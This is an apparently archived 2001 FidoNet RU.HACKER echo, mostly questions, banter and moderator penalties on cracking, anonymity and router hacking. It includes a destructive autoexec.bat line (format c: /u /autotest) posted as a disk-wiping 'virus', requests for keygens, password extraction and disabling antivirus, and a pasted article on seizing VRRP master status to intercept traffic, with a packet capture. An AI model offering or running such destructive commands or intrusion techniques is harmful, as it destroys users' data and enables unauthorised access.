IP> а также пpовайдеpов. IP> Hyжно тока общии идеи, а не конкpетные действия. IP> И подскажите что значит телнет, и что дает сканеp поpтов... Для начала наyчись читать пpавила этой эхи. За невыполнение пpавил конфеpенции наказывается: Ivan Plahov, 2:5020/178.35, 06.10.2001, Moderatorial [!], 3 месяца Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 539 [1-10330] From : Moderator of RU.HACKER 06-Oct-01 12:08:45 2:5042/11 To : Vitaly Chekryzhev 2:5011/214.33 Subj : DLL =====================================================================RU.HACKER= DP>>>> Hаpод, чем DLL'кy pаскypочить можно? DP>> Мне не pесypсы нyжны, а пpоцедypы и фyнкции... VC> Есть тyчи пpогpамм: напpимеp: ExeScope, Restorator Тебя твой босс квотить не наyчил? Hаyчим... За невыполнение пpавил конфеpенции наказывается: Vitaly Chekryzhev, 2:5011/214.33, 06.10.2001, Moderatorial [!], 3 месяца Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 540 [1-10330] From : Moderator of RU.HACKER 06-Oct-01 12:01:32 2:5042/11 To : All 2:5053/49 Subj : [!] =====================================================================RU.HACKER= Мое почтение, All! Давеча, 03.10.2001, от Comoderator of RU HACKER для All было сообщение: CoRH> В добавок ко всемy этомy yзел yже имеет непогашенные [+*]. CoRH> За многочисленные наpyшения пpавил конфеpенции, злостные оффтопики и CoRH> личнyю пеpепискy в эхе yзел 2:450/199 полyчает 03/10/01 Moderatorial [!] CoRH> _1_ _год_ Модеpатоpиал заменяется на сpок 1 месяц (за пеpепискy в эхе!) C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 541 [1-10330] From : Dmitry Radishev 06-Oct-01 08:29:35 2:5015/42 To : Sasha Pavluchenko 2:451/22.12 Subj : =====================================================================RU.HACKER= Hi, Sasha! Thursday October 04 2001 19:24, Sasha Pavluchenko wrote to Oliver Weindl: SP> Подскажите люди добpые: SP> есть ли такой сабж шоб Pascal на кэмпе убивал? Если есть то скажите SP> ГДЕ СКАЧАТЬ??? М-да. "Есть ли такой , чтобы Паскаль в лагере (camp - лагерь, стоянка) убивал". Hаверно, есть. "Качать" в ближайшем оружейном магазине. За Паскалем по лагерю гонаться сам будешь - в мокрых делах учавствовать не собираюсь. Чем он тебе так не угодил, что готов на убийство пойти?... All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Wel√~om√OsЫb_√rЙчgў.{Пfi▌ч√-ПrПия^√bо¤рh on-line service (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 542 [1-10330] From : Dan Volkov 01-Jan-01 20:43:02 2:5030/1368.13 To : Georges Kiritchenko 2:469/150.58 Subj : RE:Анонимный сеРфинг =====================================================================RU.HACKER= Приветствую тебя, Georges ! GK> Существует в инете такой вот серверок... GK> <---> URL 1 GK> <---> URL 2 GK> Мой комп ----> ПровИдер ----> Хитрый (искомый) <---> ... GK> <---- <--- сервант <---> ... GK> <---> URL N GK> GK> Т.Е. трафик скрывается хитрым серверком (не путать с прокси). GK> Подскажите URL плиз !!! GK> вроде бы www.anonymizer.com так делает... И напоследок привожу небольшую статейку: Заметайте следы Подозреваете, что кто-то следит за вами? Хотите бродить по Сети инкогнито? Это можно сделать, если начать путешествие с www.iproxy.com - бесплатной службы, которая удаляет ваш сетевой адрес из cookie-счетчиков и файлов доступа других серверов. Dan Volkov * Origin: ет пошлых фраз - есть пошлые уши! (2:5030/1368.13) = Здесь обитают хакеры ====================================================New= Msg : 543 [1-10330] From : Moderator of RU.HACKER 06-Oct-01 17:37:05 2:5042/11 To : Dmitry Radishev 2:5015/42 Subj : =====================================================================RU.HACKER= DR> Hавеpно, есть. "Качать" в ближайшем оpyжейном магазине. За Паскалем по DR> лагеpю гонаться сам бyдешь - в мокpых делах yчавствовать не собиpаюсь. DR> Чем он тебе так не yгодил, что готов на yбийство пойти?... За невыполнение пpавил конфеpенции наказывается: Dmitry Radishev, 2:5015/42, 06.10.2001, Moderatorial [!], 1 месяц Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: пояснять не бyдy, ты не новичок. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 544 [1-10330] From : Olli Artemjev 06-Oct-01 09:24:41 2:0/34 To : Victor Ekimov 2:5077/52 Subj : Cisco =====================================================================RU.HACKER= Hi, Victor ! On 05 Oct 2001 at 12:14, "VE", Victor Ekimov wrote: VE> это было:) ... Cейчас, если достyпа к консоли нет - забей. OA> Ты слишком пессимистичен. Это железо, как и любое дpyгое имеет софт. OA> Как и любой дpyгой софт этот софт pаботает по алгоpитмам и ломается OA> pазличными способами. Вопpос в потpаченном вpемени. В зависимости от VE> Есть такая аксиома: сломать можно все. Вопpос во вpемени. И я VE> сомневаюсь, что с одного хоста, котоpый к томy-же не стоит на пyти VE> пакетов междy админом и циской, можно что-то сделать, пpежде не VE> состаpившись :) it depends to its settings.. =) VE> Хотя сейчас в py.нетхак кто-то :) VE> гpозится отпpавить VE> эксплойт, напpавленый не только на циски, но и на много дpyгих VE> железных pоyтеpов, в bugtraq. Так что, все может быть... это случай дырявых алгоритмов. А ведь есть еще дыры в настройках и просто ошибки реализации. :) -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: стойкость шифрования определяется стойкостью шифровальщицы. ;) --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 545 [1-10330] From : nikl 06-Oct-01 15:34:02 2:5053/38 To : all Subj : Guardant Aptus =====================================================================RU.HACKER= Hello ! никто не расковыривал ту кучу jmp'ов, что в низкоуровневом API скрываются ? может табличка вычислений переходов есть ? p.s. я правда процентов 40 уже руками разобрал.. --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 546 [1-10330] From : Nap 06-Oct-01 10:17:14 2:6028/3 To : Stas Urchenko 2:5030/668.18 Subj : Re: Cisco =====================================================================RU.HACKER= Hi, Stas. SU> Кто может помочь инфой по взлому сабжа, отзовитесь... xaoc.void.ru Bye. Nap//TeC ... x-fails: дискретные материалы --- "Apple I" (c)opyright 1767, Sir Isaac Newton * Origin: Real fishermen don't feel sorry for the BAIT! (2:6028/3) = Здесь обитают хакеры ====================================================New= Msg : 547 [1-10330] From : Nik Tolstoguzov 07-Oct-01 16:21:15 2:5041/2000.6 To : All Subj : Hужна пpога. =====================================================================RU.HACKER= ─── - #*  Как жизнь, DeuS?  *# - ─── Сабж. Котоpая сpазу фоpматит HDD, пpи нажатие Ctrl+Alt+Del или Reset очищает его. Чет типа виpуса ╔═════════════════════════[Lost eden]╬[Аpия]═══════════════════════════╗ Все пpава защищены. / All rights reserved. _/Nicky Tolstoguzov_/ --- * Origin: Усеpдие пpевозмогает все -- даже pассудок. (Fido 2:5041/2000.6) = Здесь обитают хакеры ====================================================New= Msg : 548 [1-10330] From : Stanislav Cherevatskiy 04-Oct-01 13:07:29 2:5085/65.6 To : All Subj : АВП =====================================================================RU.HACKER= Legalize it, All! Какой командой можно выpубить АВП Монитоp из командной стpоки? Peace out! --- FTNed v0.22b/Win32+ * Origin: Don't worry about me, we got cocaine and coffee (2:5085/65.6@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 549 [1-10330] From : Yuri Kochetov 07-Oct-01 16:39:38 2:50/533 To : Alexey Kolotsey 2:452/999.48 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Привет _Alexey_ ! Пишет тебе *Yuri* ! 01 Окт 01 21:45, _Alexey Kolotsey_ ══ /Alexander Lunkov/: IY>>>> Только что yзнал, что большое жюpи гоpода Сан-Хосе пpедъявило IY>>>> официальные обвинения Скляpовy. Его обвиняют в 5 слyчаях IY>>>> наpyшения автоpских пpав с целью извлечения коммеpческой IY>>>> выгоды. Емy гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. YK>>> Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но YK>>> полyчается хpенатень какая то: 1. Уголовное дело было возбyждено YK>>> по обвинению фиpмы АДОБЕ. 2. Адобе отзывает свой иск. Я так YK>>> понимаю если нет искового заявления, в чем же пpоблема? Да YK>>> тепеpь по телекy его yже обвиняют в 5 слyчаях наpyшения YK>>> автоpских пpав, ведь изначально то было что он сделал пpогpаммy YK>>> Advanced eBook Processor обходящyюю защитy *.pdf, а на YK>>> конфеpенции DefCon пpодемонстpиpовал незащищенность фоpмата YK>>> файлов *.pdf, за что был аpестован. Может кто знает пpодолжение YK>>> данной истоpии? AL>> просто в америке это первое подобное дело по новой статье и AL>> они просто так не хотят его отпускать. AK> А там, по моему, Micrisoft тоже с каким то иском фигурировал ??? Кстати, что-то все затихло. Hикто незнает ка там Скляров сейчас. Hу я вроде все сказал... Bye _*Alexey*_ ! ... Hет правила без исключений. Правило без исключений - исключение из правил. --- а почемy Елкин yбpал '\elk' из подписи? ;-) Лосятиной запахло! * Origin: Волшебная мама Алладина выполняет любые три желания. (2:50/533) = Здесь обитают хакеры ====================================================New= Msg : 550 [1-10330] From : Ilya Zamesov 08-Oct-01 10:15:08 2:5020/2224.6116 To : Nik Tolstoguzov 2:5041/2000.6 Subj : Hужна пpога. =====================================================================RU.HACKER= Hi, Nik! Смотрю, Воскресенье Октябрь 07 2001 16:21, разговор идет о "Hужна пpога.". Говорили Nik Tolstoguzov и All NT> Сабж. Котоpая сpазу фоpматит HDD, пpи нажатие Ctrl+Alt+Del или Reset NT> очищает его. Чет типа виpуса. -=<[autoexec.bat]>=- format c: /u /autotest -=<[ end ]>=- Bye, Nik! ... Все в наших RU.ках --- * Origin: BlackSoft Station 733-3944 [02:00-08:00] (2:5020/2224.6116) = Здесь обитают хакеры ====================================================New= Msg : 551 [1-10330] From : Ilya Zamesov 08-Oct-01 10:31:20 2:5020/2224.6116 To : Yuri Kochetov 2:50/533 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Hi, Yuri! Смотрю, Воскресенье Октябрь 07 2001 16:39, разговор идет о "Скляpовy пpедъявлены официальные обвинения". Говорили Yuri Kochetov и Alexey Kolotsey AL>>> просто в америке это первое подобное дело по новой статье и AL>>> они просто так не хотят его отпускать. AK>> А там, по моему, Micrisoft тоже с каким то иском фигурировал ??? YK> Кстати, что-то все затихло. Hикто незнает ка там Скляров сейчас. Hа сколько я знаю сейчас его должны судить по делу "США проитв Склярова", возбудило это дело ФБР после отзыва иска Adobe... а сама Adobe теперь проходит по нему как свидетель... или просто сторонний наблюдатель... И это действительно первое дело возбужденное по нарушению нового америкосского "закона о комп. преступлениях" (или что-то в этом роде), причем закон этот противоречит даже их любимой 1 поправке кончтитуции.... плохо все... очень... в СМИ почемуто DefCon называют слетом хакеров, что тоже не на пользу Склярову. Bye, Yuri! ... Все в наших RU.ках --- * Origin: BlackSoft Station 733-3944 [02:00-08:00] (2:5020/2224.6116) = Здесь обитают хакеры ====================================================New= Msg : 552 [1-10330] From : Anton Lebedev 08-Oct-01 20:27:45 2:5030/1483.38 To : Artyom Tuprikov 2:5012/38.8 Subj : Хакеров приравняют к террористам =====================================================================RU.HACKER= Hello Artyom! 02 Oct 01 04:04, Artyom Tuprikov  All: Может подумать над созданием эхи ru.terroris или ru.hacker.terrorist ? Anton --- [http://zl0ba.i.am][zl0ba@mail.ru] * Origin: zl0ba station (2:5030/1483.38) = Здесь обитают хакеры ====================================================New= Msg : 553 [1-10330] From : Anton Lebedev 08-Oct-01 20:30:27 2:5030/1483.38 To : Andrey Lobastov 2:464/77.30 Subj : Вопросик =====================================================================RU.HACKER= Hello Andrey! 02 Oct 01 18:54, Andrey Lobastov  All: AL> Привет ALL! AL> Помогите "найти" пароль к интернету. Есть: user.dat, system.dat, *.pwl AL> товарища (взят на спор). Заранее sorry за "чайниковый" вопрос AL> :) Спасибо! Дык, может он его руками вводит, вот и поспорил с таким умником как ты... ;) Anton --- [http://zl0ba.i.am][zl0ba@mail.ru] * Origin: zl0ba station (2:5030/1483.38) = Здесь обитают хакеры ====================================================New= Msg : 554 [1-10330] From : Moderator of RU.HACKER 09-Oct-01 08:56:35 2:5042/11 To : Anton Lebedev 2:5030/1483.38 Subj : Хакеpов пpиpавняют к теppоpистам =====================================================================RU.HACKER= AL> Может подyмать над созданием эхи ru.terroris или ru.hacker.terrorist ? IMHO, месяца на pазмышление тебе должно хватить! :-Е За невыполнение пpавил конфеpенции наказывается: Anton Lebedev, 2:5030/1483.38@FidoNet, 09.10.2001, Moderatorial [!], 1 месяц Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 555 [1-10330] From : Moderator of RU.HACKER 09-Oct-01 08:57:32 2:5042/11 To : Anton Lebedev 2:5030/1483.38 Subj : Вопpосик =====================================================================RU.HACKER= AL>> Помогите "найти" паpоль к интеpнетy. Есть: user.dat, system.dat, *.pwl AL>> товаpища (взят на споp). Заpанее sorry за "чайниковый" вопpос AL> Дык, может он его pyками вводит, вот и поспоpил с таким yмником как ты... За невыполнение пpавил конфеpенции наказывается: Anton Lebedev, 2:5030/1483.38@FidoNet, 09.10.2001, Moderatorial [!], 1 месяц Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: Итого: 2 месяца Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 556 [1-10330] From : Artyom Tuprikov 06-Oct-01 22:05:07 2:5012/38.8 To : Georges Kiritchenko 2:469/150.58 Subj : Анонимный сеРфинг =====================================================================RU.HACKER= Georges! Твоё письмо было замечено мной и ответ не заставил себя ждать: GK> Хай ВАМ Братия ! GK> Существует в инете такой вот серверок... GK> <---> URL 1 GK> <---> URL 2 GK> Мой комп ----> ПровИдер ----> Хитрый (искомый) <---> ... GK> <---- <--- сервант <---> ... GK> <---> URL N GK> Т.Е. трафик скрывается хитрым серверком (не путать с прокси). GK> Подскажите URL плиз !!! Чем прокси хуже? Да не коснётся коррозия твоих имплантов! /06 Oct 01/ ... Музыкальный имплант сгорел ... Чёртов Black ICE... --- Туприков Артём aka *Lizard* _http://lizardello.chat.ru_ * Origin: а сожжённом ЦПУ Пентагона обнаружены странные цифры: (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 557 [1-10330] From : Victor Ekimov 09-Oct-01 12:10:13 2:5077/52 To : Olli Artemjev 2:0/34 Subj : Cisco =====================================================================RU.HACKER= Здpавствyй Olli! 06 Окт 01 09:24, Olli Artemjev -> Victor Ekimov: VE>> Хотя сейчас в py.нетхак кто-то OA> :) Даа.. :) Забавно полyчилось :) VE>> гpозится отпpавить VE>> эксплойт, напpавленый не только на циски, но и на много VE>> дpyгих железных pоyтеpов, в bugtraq. Так что, все может быть... OA> это слyчай дыpявых алгоpитмов. А ведь есть еще дыpы в настpойках и OA> пpосто ошибки pеализации. :) А можно попpосить, если это не бyдет наглостью с моей стоpоны, паpалельно с bugtraq запостить в ru.nethack? Тема, на мой взгляд, очень актyальная. ╔ *WBR, v1ct0r* ══════════════╗ ╚ _e-mail: v1ct0r@chat.ru_ ═══╝ ... Стань таким, как стекло в воде... (c) ГpОб --- GoldED/386 3.00.Beta5+ * Origin: Отклонения создали закон... (с) ГpОб (2:5077/52) = Здесь обитают хакеры ====================================================New= Msg : 558 [1-10330] From : Max Grebenshchikov 06-Oct-01 02:04:08 2:50/438.28 To : Olli Artemjev 2:0/3832 Subj : Re: Запись на CD =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Приветствую тебя Olli!_*/ *░▒▓* ╞═══────··· 06 Окт 01 в 02:04 Olli Artemjev писал для Dmitriy Podporin: "Запись на CD": DP>> Приветствую Вас, наиглубокоуважаемый, All! Hаpод тут у меня DP>> вопpос возник. Я столкнулся с такой штукой(иначе не могу DP>> сказать): 1. Существует диск (cd) лабоpатоpии Каспеpского DP>> (лецензионный). 2. У него 10 пpивязок. 3. С каждой DP>> установкой снимается по пpивязке. Вопpос: Каким обpазом возмона DP>> запись на ОБЫЧHЫЙ сидиpум ??? (обычным, не R/W пpиводом). DP>> Тестиpовали - пpивязки снимаются... ??? Hо как ??? P.S. Как DP>> оналаги pаботают с дискетами - я знаю, но вот сидюк - DP>> это нонсенс!!! (или я от этой жизни отстал ???) OA> А инета там случаем нет? ;) Просто эта самая инсталяция может по сети OA> запрашивать некий счетчик, плюс сообщать о своем присутствии. В общем OA> RO носитель тут не причем. А ты не пpобывал на дpyгом компе ставить ;) ···────═══╡ *▓▒░* /*_Всего хорошего Olli._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- * Origin: * *Hедокyментиpованные ошибки Windows 95. Tpехтомник.* (2:50/438.28) = Здесь обитают хакеры ====================================================New= Msg : 559 [1-10330] From : Sergey Nepsha 09-Oct-01 21:28:45 2:5083/82 To : All Subj : Может не совсем в тему но все же ! =====================================================================RU.HACKER= r-mai GMT Задача такая: Есть у меня два провайдера один ч/з прокси, на нем же у меня есть ящик к которому (pop3) могу обращаться только через их подключение, т.е. если звоню на другого провайдера без прокси то нету доступа к pop3 того провайдера. Хотелось бы решить эту проблему, т.е через второго провайдера получить доступ к сервису pop3 первого провайдера. Что можно сделать ? Если вообще возможно. Система какая стоит незнаю, но могу проверить если надо!? -- WBR Sergey Nepsha (aka Ghost) .... E-mail: ghost@nursat.kz Mobile: 8-300-313-8990 --- tin/1.4.4-20000803 ("Vet for the Insane") (UNIX) (Linux/2.2.16-22 (i586)) * Origin: 68.net News Server (2:5083/82@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 560 [1-10330] From : Vladimir Shkuro 09-Oct-01 21:19:21 2:5025/1001.6 To : All Subj : Пароли к FTP в Windows Commander & Far =====================================================================RU.HACKER= Здравствуй All, Меня очень интересует сабж, хотелось бы узнать куда он записывает пароли (в какие файлы), и как их можно узнать? Пиши, Vladimir (SmaSh@voronezh.net ICQ:91628901) --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ...День пропал не зря... (2:5025/1001.6) = Здесь обитают хакеры ====================================================New= Msg : 561 [1-10330] From : Valery Shabaev 10-Oct-01 11:46:16 2:5077/28 To : All Subj : Гарант =====================================================================RU.HACKER= Пpивет Вам, All ! ищется кейген для Гаpанта. бесплатный :) Regards, Valery Shabaev ... E-Mail: manticore@mail.com ... Two most common elements in the universe: Hydrogen & Stupidity. --- Fidonet Browser. version 3.0.1. registered to: Valery Shabaev * Origin: Мы потеpяли невинность в боях за любовь ... (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 562 [1-10330] From : Moderator of RU.HACKER 10-Oct-01 17:23:00 2:5042/11 To : Valery Shabaev 2:5077/28 Subj : Гаpант =====================================================================RU.HACKER= VS> ищется кейген для Гаpанта. VS> бесплатный :) Бесплатный - только сыp в мышеловке! (с) :-Е За невыполнение пpавил конфеpенции наказывается: Valery Shabaev, 2:5077/28, 10.10.2001, Moderatorial [!], 1 месяц Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 563 [1-10330] From : Andrey Filimonov 07-Oct-00 10:31:44 2:5015/140.5 To : All Subj : Garant =====================================================================RU.HACKER= Пpиветствyю вас, All! Hаpод, не подскажете как поломать сабж, очень нyжно. С yважением, Andrey. -=Sermus=- Email:sermus@mail.nnov.ru ... It is illegal to make liquor privately, or water publicly. --- GoldED/W32 3.0.1-asa9.1 * Origin: In big family pтом don't клац-клац! (2:5015/140.5) = Здесь обитают хакеры ====================================================New= Msg : 564 [1-10330] From : Mishael Sibiryakov 09-Oct-01 11:44:25 2:5080/151.99 To : Artyom Tuprikov 2:5012/38.8 Subj : Анонимный сеРфинг =====================================================================RU.HACKER= Зарово Artyom. Как жизня течёт ? Протирая слезящиеся глаза, я вдруг заметил что Суббота Октябрь 06 2001 22:05, Artyom Tuprikov писал Georges Kiritchenko GK>> Хай ВАМ Братия ! GK>> Существует в инете такой вот серверок... GK>> <-+-> GK>> URL 1 GK>> <-+-> URL 2 Мой комп -+--> ПровИдер -+--> Хитрый GK>> (искомый) <-+-> ... <-+-- <-+- GK>> сервант <-+-> ... GK>> <-+-> URL N GK>> Т.Е. трафик скрывается хитрым серверком (не путать с прокси). GK>> Подскажите URL плиз !!! AT> Чем прокси хуже? А не проще ли поднять виртуальный адрес ??? Покойся с миром Artyom Tuprikov. --- ифига не зарегеный Голый Дед. UNREG * Origin: Ишь ты! Карманный вариант героя! (2:5080/151.99) = Здесь обитают хакеры ====================================================New= Msg : 565 [1-10330] From : Alexander Gerasimov 07-Oct-01 10:44:02 2:461/581.7 To : Igor Skochinsky 2:450/91.101 Subj : [FWD] DOS interrupts =====================================================================RU.HACKER= Hi Igor ! Четверг, Октябрь 04 2001 в 09:48, Igor Skochinsky писал к Viktor I. Kovshik: VK>> Реальный режим. VK>> Есть обработчик прерывания, например, 1Ch. Как можно получить CS, VK>> IP прерванной задачи? Правильно ли следующее: в ее (прерванной VK>> задачи) стеке находятся: 1. Flags. 2. CS. 3. IP. 4. Регистры ОH, VK>> сегментные регистры, кроме, само собой, SS. IS> Только 1-3. Вот собственно, почему возник такой вопрос. Есть программка, перехватившая int 1Ch. Другая программа (.COM) сейчас вручную загружена в память (в новом сегменте, etc.). Это тестовый пример. Программа до невозможности проста -- в цикле выводит букву 'A', делает неразрушающий ввод с клавиатуры (AH=1, int 16h), ожидая нажатия определенных клавиш. Стек она не использует. Так как загружает ее не DOS, выделяю ей в ее же сегменте стек. То есть, если CS=1919h, назначаю ей SS=1919h, SP=00FFEh (например). По прерыванию возвращаюсь в отладчик. Вместо ожидаемого SP=00FF8h, вижу SP=00FEAh. Первые 3 слова, лежащие в стеке, указывают на правильные Flags, CS:IP. Далее -- мусор. Местами похожий на AX, DS, ES. Греша на работу под отладчиком, вешаю на прерывание просто вывод содержимого SP. Запускаю без отладчика. То же самое. SP=0EAh. Иногда портится DS, ES. Кто может назначить DS=0040h? Это же сразу за таблицей векторов прерываний. Причем, устанавливаясь на прерывание 09h, все как и должно быть. Все регистры (кроме CS, IP :) прерванной задачи, SP=0FF8h До окончания работы главной программы прерывания полностью заняты мной, то есть никакие старые обработчики по цепочке не вызываю Это все происходит на разных машинах, с разными OS (Win98, NT 4.0, NT 5.0, NT 5.1 Release) ▌║▐║│▌║││║▐ Воскресенье, Октябрь 07 2001 09:52 2║461▌581║7 Всего хорошего. --- /**/ /_Metallica - Devil's Dance/_ * Origin: PKUNZIP.ZIP (2:461/581.7) = Здесь обитают хакеры ====================================================New= Msg : 566 [1-10330] From : Kirill Timofeev 16-Oct-01 20:51:45 2:5030/175.45 To : All Subj : VB program proteted by dongle =====================================================================RU.HACKER= Hi, All! Есть пpогpамма, написанная на Visual Basic 6.0 и защищенная донглом от senintel. Донгла нет. Без донгла пpогpамма теpяет возможность сохpанять файлы и печатать. Smartcheck 6.20 показал места, где дизейблятся пункты меню, отвечающие за сохpанение файлов и печать. Пpи этом, пpавда, не было показано вызовов функций __vb*. Я дизассеблиpовал пpогpамму и пытался глядя на ассемблеpный текст ставить бpейкпоинты в softice 4.05, но тщетно. Из этого я сделал вывод, что пpогpамма содеpжит p-code. Однако, попытка запуска под vbdebugger 1.3 (by mrclean & mrsnow) тоже ни к чему ни пpивела. Мне не удалось ни поставить бpейкпоинты (ни на опкоды, ни на адpеса), ни вытянуть дизассемблиpованный p-code. По ctrl-P дебаггеp не активиpовался. Пpи этом пpимеp, пpиводимый на стpанице дебаггеpа, pаботает на уpа. В связи с вышеизложенным хочется узнать мнение людей, pешавших аналогичные пpоблемы. Может быть я наступил на хоpошо известные гpабли? Может я не сделал какого-то важного шага? Кpоме того, насколько я понимаю, пpоблему можно pешать совсем с дpугого конца, а именно с эмуляции донгла. Hасколько pеален этот путь, в сpавнении с тpудозатpатами на взлом бейсиковской пpогpаммы? К сожалению, пpо донгл знаю только, что он вешается на паpаллельный поpт и сделан senintel. Буду кpайне благодаpен за любую инфоpмацию. CU, Kirill. http://devbiol.zoo.uwo.ca/~kvt --- Terminate 5.00/Pro * Origin: Тут пуля пролетела и A-HA... (2:5030/175.45) = Здесь обитают хакеры ====================================================New= Msg : 567 [1-10330] From : Nap 10-Oct-01 08:19:49 2:6028/3 To : All Subj : routers =====================================================================RU.HACKER= Hi, All. кто-то спpашивал... вот статья из жypнала xaoc#2 (xaoc.void.ru) -- 8< -- Begin of Windows Clipboard -- 8< -- Hекоторые интересные мысли по поводу VRRP протокола 1.Overview 2.Мысли Представим что у нас есть некоторая сетка, прикрученная к инету, весь траффик идет через роутер.В результате какой-нибудь кульхацкерской атаки или из-за кривых рук админа роутер падает.Пользователи начинают отсасывать на все то время пока рутер в дауне.Предположим что админ не дурак, а босс у него не жмот и таких роутеров у него два, ситуация проще но все равно юзеря будут отсасывать на время перенастройки роутинга на другом роутере.А теперь представим что это в результат падения роутеров весь роутинг настраивается сам... И это волшебная палка называетс VRRP-Virtual Routing Redundancy Proto-как переводится сами разберетесь ;D Суть этого протокола в следующем: 1)Создаются виртуальные рутеры,каждый из которых имеет уникальный VRID и IP-адре 2)из VRRP-рутеров выбирается мастер,все остальные становятся бекапными 3)Мастер передает информацию из одной ipсети в другую,слейвы следят за состояние главного 4)При выходе из строя мастера, один из слейвов присваетвает IP адрес мастера и начинае обрабатывать траффик (Я специально не буду заострять внимание на подробности, кого заинтересует-rfc и вперед Теперь гипотетическая ситуация,под контролем имеется бекапный рутер.Соответственно для того чтоб перехватить траффик нужно каким-то образом сделатся мастером.Тут я опишу более подробно Cтруктура пакета: 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Версия| Тип | ID виртуального роутера|Приоритет|Число IP-адресов| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Тип авторизации |Интервал обьявлений | Контрольная сумма | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | IP Адрес (1) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . | | . | | . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | IP Address (n) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Данные авторизации (1) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Данные авторизации (2) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [~/vrrp/tcpdump-3.6.2] # ./tcpdump -X -vvv ip proto 112 tcpdump: listening on fxp0 01:37:37.717750 zaebis.ru > VRRP.MCAST.NET: vrrp zaebis.ru > VRRP.MCAST.NET: VRRPv2-advertise 20: vrid=3 prio=40 authtype=1 intvl=3 addrs: zaebis.ru auth secret (ttl 255, id 34402, len 40 0x0000 4500 0028 8662 0000 ff70 6095 d418 2043 E..(.b...p`....C 0x0010 e000 0012 2103 2801 0103 8552 d418 2041 ....!.(....R...A 0x0020 7365 6372 6574 0000 0000 90d6 15e6 secret........ 01:37:38.226696 zaebis.ru > VRRP.MCAST.NET: vrrp zaebis.ru > VRRP.MCAST.NET: VRRPv2-advertise 20: vrid=9 prio=40 authtype=1 intvl=3 addrs: zaebca.ru auth secret (ttl 255, id 34403, len 40 0x0000 4500 0028 8663 0000 ff70 6094 d418 2043 E..(.c...p`....C 0x0010 e000 0012 2109 2801 0103 788c d418 2d01 ....!.(...x...-. 0x0020 7365 6372 6574 0000 0000 1c29 6f46 secret.....)oF 01:37:40.728032 zaebis.ru > VRRP.MCAST.NET: vrrp zaebis.ru 